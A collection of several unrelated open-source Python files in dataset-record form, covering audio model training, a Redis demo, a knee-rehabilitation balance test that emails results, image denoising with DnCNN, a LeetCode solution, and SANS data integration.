dict_args[\"kernel_size\"] = tconf[\"kernel_size\"]\n dict_args[\"causal\"] = tconf[\"causal\"]\n if \"channel_width\" in tconf:\n dict_args[\"channel_width\"] = 
tconf[\"channel_width\"]\n model = TCNModel(**dict_args)\n elif tconf[\"model_type\"] == 'lstm':\n dict_args[\"num_layers\"] = tconf[\"num_layers\"]\n dict_args[\"hidden_size\"] = tconf[\"hidden_size\"]\n model = LSTMModel(**dict_args)\n\n # summary \n torchsummary.summary(model, [(1,65536), (1,2)], device=\"cpu\")\n\n # train!\n trainer.fit(model, train_dataloader, val_dataloader)\n","repo_name":"csteinmetz1/micro-tcn","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8325,"program_lang":"python","lang":"en","doc_type":"code","stars":124,"dataset":"github-code","pt":"38"}
+{"seq_id":"74640633391","text":"import redis\n\ntry:\n r = redis.Redis(host='localhost',\n port=6379,\n db=0)\n r.ping() # This will attempt to ping the server, and if successful, you're connected.\n print(\"Connected to Redis\")\n\n r.set('foo', 'bar') # create record\n value = r.get('foo') # read record\n\n print(value) # bar\nexcept redis.ConnectionError:\n print(\"Could not connect to Redis\")\n","repo_name":"Ruslan-Skira/goit_web","sub_path":"module08/lesson02/from_lecture/redis_l.py","file_name":"redis_l.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"29033891744","text":"# Author: Group 23 (Miguel, Akanksha, Dorian)\n# Date: March 12th 2023\n# Purpose: Showcase how to use the DataReceive.py library\n\n\nimport DataReceive # Name of the file containing the bluetooth serial object\nimport time\nimport matplotlib.pyplot as plt\nimport keyboard\nfrom email_setup import *\nfrom processing_funcs import *\nfrom plotting import *\nfrom os import listdir\nfrom os.path import isfile, join\n\n\n# setting clinician email\nclinician_email = 'knighd7@mcmaster.ca' # 'martim96@mcmaster.ca'#'nehetea@mcmaster.ca'\n\n# READ THIS COMMENT OR ELSE THERE WILL BE PROBLEMS\n\n'''Make sure to check the value of bluetoothCommObject.successfullConnect\nThis value will tell you if you're connected or not - please build a contingency plan\nin case connection is not successfully established (whether that is try again or raise some exception\n\nNote: you only need to check if the connection was successfully established at the start as the connection persists as long as the object is alive'''\n\n# Make the bluetooth object that will establish the connect and send back data\n\nbluetoothCommObject = DataReceive.bluetoothTelephone()\nif (bluetoothCommObject.successfullConnect == True):\n print(\"Connection was successfully established \\n\")\nelse:\n print(\"Connection was not successfully established\")\n\n\n# initializing arrays for holding angle data from each direction of the SEBT test for nonoperative leg\nanterior_SEBT_nonop = []\nanterolateral_SEBT_nonop = []\nanteromedial_SEBT_nonop = []\nlateral_SEBT_nonop = []\nmedial_SEBT_nonop = []\nposterolateral_SEBT_nonop = []\nposteromedial_SEBT_nonop = []\nposterior_SEBT_nonop = []\n\n# initializing arrays for holding angle data from each direction of the SEBT test for operative leg\nanterior_SEBT_op = []\nanterolateral_SEBT_op = []\nanteromedial_SEBT_op = []\nlateral_SEBT_op = []\nmedial_SEBT_op = []\nposterolateral_SEBT_op = []\nposteromedial_SEBT_op = []\nposterior_SEBT_op = []\n\n\n# arrays for holding foot center of mass data during each direction of the SEBT test for nonoperative leg\nanterior_CofMs_nonop = []\nanterolateral_CofMs_nonop = []\nanteromedial_CofMs_nonop = []\nlateral_CofMs_nonop = []\nmedial_CofMs_nonop = []\nposterolateral_CofMs_nonop = []\nposteromedial_CofMs_nonop = []\nposterior_CofMs_nonop = []\n\n# arrays for holding foot center of mass data during each direction of the SEBT test for operative leg\nanterior_CofMs_op = []\nanterolateral_CofMs_op = []\nanteromedial_CofMs_op = []\nlateral_CofMs_op = []\nmedial_CofMs_op = []\nposterolateral_CofMs_op = []\nposteromedial_CofMs_op = []\nposterior_CofMs_op = []\n\n\n# function for conducting each stage of the SEBT test\ndef conduct_stage(stage_array: list[float], leg: str, CofM_array: list[tuple], stage_name: str):\n while (1):\n\n # Call the get data function - it will return an array containing the load cell values and knee angle\n loadcells, bno, emg = bluetoothCommObject.getData()\n\n print(\"Raw Loadcell Values\" + str(loadcells))\n # print(emg)\n print(\"Knee angle: \" + str(bno))\n\n # calcluating center of mass value\n XCofM, YCofM = get_Cof_M(loadcells)\n\n # printing x and y values of center of mass for debugging purposes\n print('Center of Mass: (' + str(XCofM) + ',' + str(YCofM)+')')\n\n # adding data to arrays for later plotting\n stage_array.append(bno)\n CofM_array.append((XCofM, YCofM))\n\n time.sleep(0.150) # Sleep for 1 second\n\n if keyboard.is_pressed(' '):\n print(\n f\"SEBT test in the {stage_name} direction finished on 
the {leg} leg.\")\n break\n\n\n# first stage of SEBT test (anterior) on non-operative leg\ninput('Ready for anterior orientation SEBT test on the non-operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the anterior direction.')\nconduct_stage(anterior_SEBT_nonop, 'non-operative',\n anterior_CofMs_nonop, 'anterior')\nprint(\"Moving on to the anteromedial direction of the test.\")\n\n\n# first stage of SEBT test (anteromedial) on non-operative leg\ninput('Ready for anteromedial orientation SEBT test on the non-operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the anteromedial direction.')\nconduct_stage(anteromedial_SEBT_nonop, 'non-operative',\n anteromedial_CofMs_nonop, 'anteromedial')\nprint(\"Moving on to the anterolateral direction of the test.\")\n\n\n# third stage of SEBT test (anterolateral) on non-operative leg\ninput('Ready for anterolateral orientation SEBT test on the non-operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the anterolateral direction.')\nconduct_stage(anterolateral_SEBT_nonop, 'non-operative',\n anterolateral_CofMs_nonop, 'anterolateral')\nprint(\"Moving on to the lateral direction of the test.\")\n\n# fourth stage of SEBT test (lateral) on non-operative leg\ninput('Ready for lateral orientation SEBT test on the non-operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the lateral direction.')\nconduct_stage(lateral_SEBT_nonop, 'non-operative',\n lateral_CofMs_nonop, 'lateral')\nprint(\"Moving on to the posterolateral direction of the test.\")\n\n# fifth stage of SEBT test (posterolateral) on non-operative leg\ninput('Ready for posterolateral orientation SEBT test on the non-operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the posterolateral direction.')\nconduct_stage(posterolateral_SEBT_nonop, 'non-operative',\n posterolateral_CofMs_nonop, 'posterolateral')\nprint(\"Moving on to the posterior direction of the test.\")\n\n# sixth stage of SEBT test (posterior) on non-operative leg\ninput('Ready for posterior orientation SEBT test on the non-operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the posterior direction.')\nconduct_stage(posterior_SEBT_nonop, 'non-operative',\n posterior_CofMs_nonop, 'posterior')\nprint(\"Moving on to the posteromedial direction of the test.\")\n\n# seventh stage of SEBT test (posteriomedial) on non-operative leg\ninput('Ready for posteromedial orientation SEBT test on the non-operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the posterior direction.')\nconduct_stage(posteromedial_SEBT_nonop, 'non-operative',\n posteromedial_CofMs_nonop, 'posteromedial')\nprint(\"Moving on to the medial direction of the test.\")\n\n# eighth stage of SEBT test (medial) on non-operative leg\ninput('Ready for medial orientation SEBT test on the non-operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the medial direction.')\nconduct_stage(medial_SEBT_nonop, 'non-operative', medial_CofMs_nonop, 'medial')\nprint(\"SEBT testing for the non-operative leg finished. Please place the apparatus on the operative leg in order to conduct the test again.\")\n\n# first stage of SEBT test (anterior) on operative leg\ninput('Ready for anterior orientation SEBT test on the operative leg? 
Press Enter to Continue.')\nprint('Press spacebar key upon completion of the anterior direction.')\nconduct_stage(anterior_SEBT_op, 'operative',\n              anterior_CofMs_op, 'anterior')\nprint(\"Moving on to the anteromedial direction of the test.\")\n\n\n# second stage of SEBT test (anteromedial) on operative leg\ninput('Ready for anteromedial orientation SEBT test on the operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the anteromedial direction.')\nconduct_stage(anteromedial_SEBT_op, 'operative',\n              anteromedial_CofMs_op, 'anteromedial')\nprint(\"Moving on to the anterolateral direction of the test.\")\n\n\n# third stage of SEBT test (anterolateral) on operative leg\ninput('Ready for anterolateral orientation SEBT test on the operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the anterolateral direction.')\nconduct_stage(anterolateral_SEBT_op, 'operative',\n              anterolateral_CofMs_op, 'anterolateral')\nprint(\"Moving on to the lateral direction of the test.\")\n\n# fourth stage of SEBT test (lateral) on operative leg\ninput('Ready for lateral orientation SEBT test on the operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the lateral direction.')\nconduct_stage(lateral_SEBT_op, 'operative',\n              lateral_CofMs_op, 'lateral')\nprint(\"Moving on to the posterolateral direction of the test.\")\n\n# fifth stage of SEBT test (posterolateral) on operative leg\ninput('Ready for posterolateral orientation SEBT test on the operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the posterolateral direction.')\nconduct_stage(posterolateral_SEBT_op, 'operative',\n              posterolateral_CofMs_op, 'posterolateral')\nprint(\"Moving on to the posterior direction of the test.\")\n\n# sixth stage of SEBT test (posterior) on operative leg\ninput('Ready for posterior orientation SEBT test on the operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the posterior direction.')\nconduct_stage(posterior_SEBT_op, 'operative',\n              posterior_CofMs_op, 'posterior')\nprint(\"Moving on to the posteromedial direction of the test.\")\n\n# seventh stage of SEBT test (posteromedial) on operative leg\ninput('Ready for posteromedial orientation SEBT test on the operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the posteromedial direction.')\nconduct_stage(posteromedial_SEBT_op, 'operative',\n              posteromedial_CofMs_op, 'posteromedial')\nprint(\"Moving on to the medial direction of the test.\")\n\n# eighth stage of SEBT test (medial) on operative leg\ninput('Ready for medial orientation SEBT test on the operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the medial direction.')\nconduct_stage(medial_SEBT_op, 'operative', medial_CofMs_op, 'medial')\nprint(\"SEBT testing for the operative leg finished. 
Finished testing, please remove apparatus.\")\n\n\n# debugging purposes\nSEBT_data = {\n 'Anterior': [anterior_SEBT_op, anterior_SEBT_nonop],\n 'Anterolateral': [anterolateral_SEBT_op, anterolateral_SEBT_nonop],\n 'Anteromedial': [anteromedial_SEBT_op, anteromedial_SEBT_nonop],\n 'Lateral': [lateral_SEBT_op, lateral_SEBT_nonop],\n 'Medial': [medial_SEBT_op, medial_SEBT_nonop],\n 'Posterolateral': [posterolateral_SEBT_op, posterolateral_SEBT_nonop],\n 'Posteromedial': [posteromedial_SEBT_op, posteromedial_SEBT_nonop],\n 'Posterior': [posterior_SEBT_op, posterior_SEBT_nonop]\n}\n\nCofM_data = {\n 'Anterior': [anterior_CofMs_op, anterior_CofMs_nonop],\n 'Anterolateral': [anterolateral_CofMs_op, anterolateral_CofMs_nonop],\n 'Anteromedial': [anteromedial_CofMs_op, anteromedial_CofMs_nonop],\n 'Lateral': [lateral_CofMs_op, lateral_CofMs_nonop],\n 'Medial': [medial_CofMs_op, medial_CofMs_nonop],\n 'Posterolateral': [posterolateral_CofMs_op, posterolateral_CofMs_nonop],\n 'Posteromedial': [posteromedial_CofMs_op, posteromedial_CofMs_nonop],\n 'Posterior': [posterior_CofMs_op, posterior_CofMs_nonop]\n}\n\n\nfor item in SEBT_data:\n plot_SEBT_graph(SEBT_data[item][0], SEBT_data[item][1], item)\nprint(\"graphs saved to folder\")\n\n# debugging, remove later\n#print(SEBT_data)\n\n# debugging, remove later\n#print(CofM_data)\n\n# saving CofM images to folder\nfor item in CofM_data:\n plot_CofM_deviations(CofM_data[item][0], CofM_data[item][1], item)\n\n\n# getting filenames to send as attachments\nanglefiles = ['sebt/' + f for f in listdir('sebt') if isfile(join('sebt', f))]\nCofMfiles = ['CofM_images/' +\n f for f in listdir('CofM_images') if isfile(join('CofM_images', f))]\n\nfile_names = anglefiles + CofMfiles\n\nsend_emails([clinician_email], file_names, SEBT_data, CofM_data)\n","repo_name":"DorianKnight/IBEHS-3P04-ACL-Reconstruction","sub_path":"Testreceive.py","file_name":"Testreceive.py","file_ext":"py","file_size_in_byte":11797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"41538224999","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n#np.random.seed(1234)\n#print(np.random.randn(4))\n\nX = np.array([[147, 150, 153, 158, 163, 165, 168, 170, 173, 175, 178, 180, 183]]).transpose()\ny = np.array([[5, 6, 7, 8, 9, 10]])\none = np.ones((X.shape[0], 1))\ntest = np.concatenate((one, X), axis = 1)\nprint(X)\nprint(test)","repo_name":"phamquanganhBKSET/machine_learning","sub_path":"math/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"40600068606","text":"# Definition for an interval.\nclass Interval(object):\n def __init__(self, s=0, e=0):\n self.start = s\n self.end = e\n\nclass Solution(object):\n def insert(self, intervals, newInterval):\n \"\"\"\n :type intervals: List[Interval]\n :type newInterval: Interval\n :rtype: List[Interval]\n \"\"\"\n\n n = len(intervals)\n overlap = 0 # 重叠区间数\n i = 0\n while i < n:\n # 1. 如果新区间的末尾小于当前区间的开头,则跳出循环\n if newInterval.end < intervals[i].start:\n break\n # 2. 如果新区间的开头大于当前区间的末尾,不作处理\n elif newInterval.start > intervals[i].end:\n pass\n # 3. 如果新区间和当前区间有重叠,合并区间\n else:\n newInterval.start = min(intervals[i].start, newInterval.start)\n newInterval.end = max(intervals[i].end, newInterval.end)\n overlap += 1\n i += 1\n\n # 如果有区间重叠,删除数组中所有与新区间重叠的区间\n if overlap > 0:\n intervals = intervals[:i-overlap] + intervals[i:]\n intervals.insert( i - overlap, newInterval)\n return intervals\n \n \n \nintervals = []\ntmp = Interval(1,3)\nintervals.append(tmp)\ntmp = Interval(6,9)\nintervals.append(tmp)\n# tmp = Interval(2,6)\n# intervals.append(tmp)\n# tmp = Interval(15,18)\n# intervals.append(tmp)\n\nnewInterval = Interval(0, 1)\n\ns = Solution()\nr = s.insert(intervals, newInterval)\nfor i in range(len(r)):\n\tprint(r[i].start, r[i].end)","repo_name":"Rosevil1874/LeetCode-Solution-Python-Java","sub_path":"Python-Solution/57_Insert-Interval/57.py","file_name":"57.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"38"}
+{"seq_id":"7564592868","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# Write a Python Program to get the third side of right angled triangle from two given sides?\n\n# In[1]:\n\n\nfrom math import sqrt\n\n\n# In[ ]:\n\n\nprint('Enter length of two given sides')\na=float(input('Enter a :'))\nb=float(input('Enter b :'))\nc=sqrt(a**2 + b**2)\nprint('The length of third side',c)\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"RohitDhuriya/Internship","sub_path":"Python worksheet 1 Q no.14 (1).py","file_name":"Python worksheet 1 Q no.14 (1).py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"22046323536","text":"import os\nimport argparse\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision.utils as utils\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\nfrom torch.utils.tensorboard import SummaryWriter\nfrom models import DnCNN\nfrom dataset import prepare_data, Dataset\nfrom utils import *\n\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n\n# 参数管理\nparser = argparse.ArgumentParser(description=\"DnCNN\")\nparser.add_argument(\"--preprocess\", type=bool, default=False, help='run prepare_data or not')\nparser.add_argument(\"--batchSize\", type=int, default=64, help=\"Training batch size\")\nparser.add_argument(\"--num_of_layers\", type=int, default=17, help=\"Number of total layers\")\nparser.add_argument(\"--epochs\", type=int, default=50, help=\"Number of training epochs\")\nparser.add_argument(\"--milestone\", type=int, default=30, help=\"When to decay learning rate; should be less than epochs\")\nparser.add_argument(\"--lr\", type=float, default=1e-3, help=\"Initial learning rate\")\nparser.add_argument(\"--outf\", type=str, default=\"train_logs\", help='path of log files')\nparser.add_argument(\"--logdir\", type=str, default=\"test_logs\", help='path of log files')\nparser.add_argument(\"--noiseL\", type=float, default=25, help='noise level')\nparser.add_argument(\"--val_noiseL\", type=float, default=25, help='noise level used on validation set')\nopt = parser.parse_args()\n\n\ndef main():\n # Load dataset\n print('Loading dataset ...\\n')\n dataset_train = Dataset(train=True)\n dataset_val = Dataset(train=False)\n loader_train = DataLoader(dataset=dataset_train, num_workers=4, batch_size=opt.batchSize, shuffle=True)\n print(\"# of training samples: %d\\n\" % int(len(dataset_train)))\n # Build model\n net = DnCNN(channels=1, num_of_layers=opt.num_of_layers) # 实例化网络,通道数为1(针对灰度图像)\n net.apply(weights_init_kaiming) # 权重初始化\n criterion = nn.MSELoss(reduction='sum') # loss标准为L2均方和\n # Move to GPU\n device_ids = [0]\n model = nn.DataParallel(net, device_ids=device_ids).cuda()\n criterion.cuda()\n # Optimizer\n optimizer = optim.Adam(model.parameters(), lr=opt.lr) # 使用Adam优化算法\n # training\n writer = SummaryWriter(opt.outf) # 记录训练logs\n step = 0\n for epoch in range(opt.epochs):\n if epoch < opt.milestone:\n current_lr = opt.lr\n else: # 当周期数超过milestone,衰减学习率,防止过拟合\n current_lr = opt.lr / 10.\n # set learning rate\n for param_group in optimizer.param_groups:\n param_group[\"lr\"] = current_lr\n print('learning rate %f' % current_lr)\n # train\n for i, data in enumerate(loader_train, 0):\n # training step\n model.train() # 训练模式,确保BN参数在训练过程中更新\n model.zero_grad() # 初始化模型梯度\n optimizer.zero_grad() # 初始化优化器梯度\n img_train = data\n noise = torch.FloatTensor(img_train.size()).normal_(mean=0, std=opt.noiseL / 255.) # 生成加性白噪声\n imgn_train = img_train + noise # 生成噪声图像\n img_train, imgn_train = Variable(img_train.cuda()), Variable(imgn_train.cuda()) # 激活GPU计算\n noise = Variable(noise.cuda())\n out_train = model(imgn_train) # 应用模型\n loss = criterion(out_train, noise) / (imgn_train.size()[0] * 2) # 计算loss\n loss.backward() # 反向传播\n optimizer.step() # 更新网络参数\n # results\n model.eval() # 测试模式,确保BN参数在训练过程中不变\n out_train = torch.clamp(imgn_train - model(imgn_train), 0., 1.) # 归一化\n psnr_train = batch_PSNR(out_train, img_train, 1.) 
# 计算信噪比\n print(\"[epoch %d][%d/%d] loss: %.4f PSNR_train: %.4f\" %\n (epoch + 1, i + 1, len(loader_train), loss.item(), psnr_train))\n if step % 10 == 0:\n # Log the scalar values\n writer.add_scalar('loss', loss.item(), step)\n writer.add_scalar('PSNR on training data', psnr_train, step)\n step += 1\n ## the end of each epoch\n model.eval()\n # validate\n psnr_val = 0 # 平均信噪比\n for k in range(len(dataset_val)):\n img_val = torch.unsqueeze(dataset_val[k], 0) # 增加维度\n noise = torch.FloatTensor(img_val.size()).normal_(mean=0, std=opt.val_noiseL / 255.)\n imgn_val = img_val + noise # 生成加性白噪声图像\n with torch.no_grad(): # 节省显存\n img_val, imgn_val = Variable(img_val.cuda()), Variable(imgn_val.cuda())\n out_val = torch.clamp(imgn_val - model(imgn_val), 0., 1.)\n psnr_val += batch_PSNR(out_val, img_val, 1.)\n psnr_val /= len(dataset_val) # 计算平均信噪比\n print(\"\\n[epoch %d] PSNR_val: %.4f\" % (epoch + 1, psnr_val))\n writer.add_scalar('PSNR on validation data', psnr_val, epoch + 1)\n # log the images\n out_train = torch.clamp(imgn_train - model(imgn_train), 0., 1.)\n Img = utils.make_grid(img_train.data, nrow=8, normalize=True, scale_each=True) # 原图像网格\n Imgn = utils.make_grid(imgn_train.data, nrow=8, normalize=True, scale_each=True) # 噪声图像网格\n Irecon = utils.make_grid(out_train.data, nrow=8, normalize=True, scale_each=True) # 降噪图像网格\n writer.add_image('clean image', Img, epoch)\n writer.add_image('noisy image', Imgn, epoch)\n writer.add_image('reconstructed image', Irecon, epoch)\n # save model\n torch.save(model.state_dict(), os.path.join(opt.outf, 'net.pth'))\n torch.save(model.state_dict(), os.path.join(opt.logdir, 'net.pth'))\n\n\nif __name__ == \"__main__\":\n if opt.preprocess: # 如需要,进行数据集预处理\n prepare_data(data_path='data', patch_size=40, stride=10, aug_times=1)\n main()\n","repo_name":"joeyscave/cv","sub_path":"lab 2 : Image Denosing/lab2 : Image DeNoising/src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"27305195591","text":"from tkinter import Tk\n\nfrom app.ui.application_ui import ApplicationUi\n\n\ndef start_app():\n root = Tk()\n root.minsize(width=800, height=600)\n app = ApplicationUi(root)\n root.mainloop()\n\n\nif __name__ == '__main__':\n start_app()\n","repo_name":"oallaire/assembly-pdf-generator","sub_path":"app/app_main.py","file_name":"app_main.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"70130360750","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 27 21:47:30 2023\n\n@author: lutzbueno_v\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom utils import load_hdf\nimport re\nimport plot_integration as plot_integ\nfrom utils import create_analysis_folder\nfrom utils import save_results\nfrom correction import prepare_corrections\nfrom correction import load_standards\nfrom correction import load_and_normalize\nfrom correction import correct_dark\nfrom correction import correct_EC\nfrom calibration import absolute_calibration\n\n\ndef set_integration(config, result):\n # find all files in the folder\n path_dir_an = create_analysis_folder(config)\n list_dir = list(os.listdir(path_dir_an))\n force_reintegrate = config['analysis']['force_reintegrate']\n perform_abs_calib = config['analysis']['perform_abs_calib']\n for folder_name in list_dir:\n if folder_name[0:3] == 'det':\n det = folder_name[4:]\n path_det = os.path.join(path_dir_an, str(folder_name))\n # create poni and masks\n path_rad_int = os.path.join(path_det, 'integration/')\n if not os.path.exists(path_rad_int):\n os.mkdir(path_rad_int)\n # name the sample\n path = path_rad_int\n prefix = 'radial_integ'\n class_file = result['overview']['det_files_' + det]\n scanNr = class_file['scan'][-1]\n sample_name = class_file['sample_name'][-1]\n frame = 0\n sufix = 'dat'\n last_file = make_file_name(path, prefix, sufix, sample_name, det, scanNr, frame)\n # check if we want to integrate\n if os.path.exists(last_file) and force_reintegrate == 0:\n print('All files are already integrated at ' + det + 'm')\n else:\n prepare_corrections(config, result, det)\n if perform_abs_calib == 1:\n result = load_standards(config, result, det)\n result = integrate(config, result, det, path_rad_int)\n return result\n\ndef make_file_name(path, prefix, sufix, sample_name, det, scanNr, frame):\n file_n = path + prefix + '_' + f\"{scanNr:07d}\" + '_'+ f\"{frame:05d}_\" + sample_name + '_' +'det' + det + 'm'+ '.' 
+ sufix\r\n    return file_n\r\n\r\ndef integrate(config, result, det, path_rad_int):\r\n    plt.ioff()\r\n    path_hdf_raw = config['analysis']['path_hdf_raw']\r\n    # correct to absolute scale\r\n    perform_abs_calib = config['analysis']['perform_abs_calib']\r\n    perform_azimuthal = config['analysis']['perform_azimuthal']\r\n    perform_radial = config['analysis']['perform_radial']\r\n    class_file = result['overview']['det_files_'+ det]\r\n\r\n    # pixel range defines how many q the final curve will contain\r\n    pixel_range = range(0, 100)\r\n    result['integration']['pixel_range'] = pixel_range\r\n    # execute the corrections for all\r\n    print('DOING ' + str(det) + 'm')\r\n    for ii in range(0, len(class_file['sample_name'])):\r\n        name_hdf = class_file['name_hdf'][ii]\r\n        sample_name = class_file['sample_name'][ii]\r\n        scanNr = class_file['scan'][ii]\r\n        # do radial integration for each frame\r\n        for ff in range(0, class_file['frame_nr'][ii]):\r\n            if perform_abs_calib == 1:\r\n                dark = result['integration']['cadmium']\r\n                img = load_and_normalize(config, result, name_hdf)\r\n                # Subtract empty cell and Cadmium\r\n                img_cell = result['integration']['empty_cell']\r\n                # subtraction of empty cell\r\n                if class_file['frame_nr'][ii] > 1:\r\n                    img1 = correct_dark(img[ff,:,:], dark)\r\n                    img1 = correct_EC(img1, img_cell)\r\n                else:\r\n                    img1 = correct_dark(img, dark)\r\n                    img1 = correct_EC(img1, img_cell)\r\n                print('Corrected scan ' + class_file['name_hdf'][ii] + ', Frame: ' + str(ff) )\r\n            else:\r\n                img = load_hdf(path_hdf_raw, name_hdf, 'counts')\r\n                if class_file['frame_nr'][ii] > 1:\r\n                    img1 = img[ff,:,:]\r\n                else:\r\n                    img1 = img\r\n                print('NOT corrected scan ' + class_file['name_hdf'][ii] + ', Frame: ' + str(ff) )\r\n            img1 = np.squeeze(img1)\r\n            # get the frame number\r\n            frame = ff\r\n            # radial and azimuthal integration\r\n            if perform_radial == 1:\r\n                # name the sample\r\n                prefix = 'pattern2D'\r\n                sufix = 'dat'\r\n                file_name = make_file_name(path_rad_int, prefix, sufix, sample_name, det, scanNr, frame)\r\n                np.savetxt(file_name, img1, delimiter=',')\r\n                # name the sample\r\n                prefix = 'radial_integ'\r\n                sufix = 'dat'\r\n                file_name = make_file_name(path_rad_int, prefix, sufix, sample_name, det, scanNr, frame)\r\n                radial_integ(config, result, img1, file_name)\r\n            if perform_azimuthal == 1:\r\n                # name the sample\r\n                prefix = 'azim_integ'\r\n                sufix = 'dat'\r\n                file_name = make_file_name(path_rad_int, prefix, sufix, sample_name, det, scanNr, frame)\r\n                azimuthal_integ(config, result, img1, file_name)\r\n            plot_radial_integ(config, result, file_name)\r\n    return result\r\n\r\n\r\ndef radial_integ(config, result, img1, file_name):\r\n    ai = result['integration']['ai']\r\n    mask = result['integration']['int_mask']\r\n    pixel_range = result['integration']['pixel_range']\r\n    perform_abs_calib = config['analysis']['perform_abs_calib']\r\n    # integrate for radial plots\r\n    q, I, sigma = ai.integrate1d(img1, len(pixel_range),\r\n                                 correctSolidAngle = True,\r\n                                 mask = mask,\r\n                                 method = 'nosplit_csr',\r\n                                 unit = 'q_A^-1',\r\n                                 safe = True,\r\n                                 error_model=\"azimuthal\",\r\n                                 flat = None,\r\n                                 dark = None)\r\n    if perform_abs_calib == 1:\r\n        # correct for the number of pixels\r\n        flat = result['integration']['water']\r\n        q_flat, I_flat, sigma_flat = ai.integrate1d(flat, len(pixel_range),\r\n                                     correctSolidAngle = True,\r\n                                     mask = mask,\r\n                                     method = 'nosplit_csr',\r\n                                     unit = 'q_A^-1',\r\n                                     safe = True,\r\n                                     error_model=\"azimuthal\",\r\n                                     flat = None,\r\n                                     dark = None)\r\n        I, sigma = absolute_calibration(config, result, file_name, I, sigma, I_flat)\r\n    # save the integrated files\r\n    data_save = np.column_stack((q, I, sigma))\r\n    header_text = 'q (A-1), absolute intensity I (1/cm), standard deviation'\r\n    
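# usage sketch (added note, not part of the original pipeline): np.savetxt prefixes\r\n    # the header with '#', which np.loadtxt skips by default, so the curve can be\r\n    # reloaded with, e.g., q, I, sigma = np.loadtxt(file_name, delimiter=',', unpack=True)\r\n    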
np.savetxt(file_name, data_save, delimiter=',' , header = header_text)\n # save result\n path_dir_an = create_analysis_folder(config)\n save_results(path_dir_an, result)\n\n\ndef azimuthal_integ(config, result, img1, file_name):\n ai = result['integration']['ai']\n mask = result['integration']['int_mask']\n pixel_range = result['integration']['pixel_range']\n perform_abs_calib = config['analysis']['perform_abs_calib']\n # define the number of sectors\n sectors_nr = 16\n # integrate for azimuthal plots\n npt_azim = range(0, 370, int(360/sectors_nr))\n result['integration']['sectors_nr'] = sectors_nr\n result['integration']['npt_azim'] = npt_azim\n for rr in range(0, len(npt_azim)-1):\n azim_start = npt_azim[rr]\n azim_end = npt_azim[rr+1]\n q, I, sigma = ai.integrate1d(img1, len(pixel_range),\n correctSolidAngle = True,\n mask = mask,\n method = 'nosplit_csr',\n unit = 'q_A^-1',\n safe = True,\n error_model = \"azimuthal\",\n azimuth_range = [azim_start, azim_end],\n flat = None,\n dark = None)\n if perform_abs_calib == 1:\n # correct for the number of pixels\n flat = result['integration']['water']\n q_flat, I_flat, sigma_flat = ai.integrate1d(flat, len(pixel_range),\n correctSolidAngle = True,\n mask = mask,\n method = 'nosplit_csr',\n unit = 'q_A^-1',\n safe = True,\n error_model = \"azimuthal\",\n azimuth_range = [azim_start, azim_end],\n flat = None,\n dark = None)\n I, sigma = absolute_calibration(config, result, file_name, I, sigma, I_flat)\n if rr == 0:\n I_all = I\n sigma_all = sigma\n else:\n I_all = np.column_stack((I_all,I))\n sigma_all = np.column_stack((sigma_all, sigma))\n #save the integrated data\n data_save = np.column_stack((q, I_all, sigma_all))\n header_text = 'q (A-1), ' + str(sectors_nr) + ' columns for absolute intensity I (1/cm), '+ str(sectors_nr) + ' columns for standard deviation'\n np.savetxt(file_name, data_save, delimiter=',' , header = header_text)\n # save result\n path_dir_an = create_analysis_folder(config)\n save_results(path_dir_an, result)\n\ndef plot_radial_integ(config, result, file_name):\n # plot and save the results\n if config['analysis']['plot_azimuthal'] ==1:\n ScanNr = int(re.findall(r\"\\D(\\d{7})\\D\", file_name)[0])\n Frame = int(re.findall(r\"\\D(\\d{5})\\D\", file_name)[0])\n plot_integ.plot_integ_azimuthal(config, result, ScanNr, Frame)\n\n if config['analysis']['plot_radial'] ==1:\n ScanNr = int(re.findall(r\"\\D(\\d{7})\\D\", file_name)[0])\n Frame = int(re.findall(r\"\\D(\\d{5})\\D\", file_name)[0])\n plot_integ.plot_integ_radial(config, result, ScanNr, 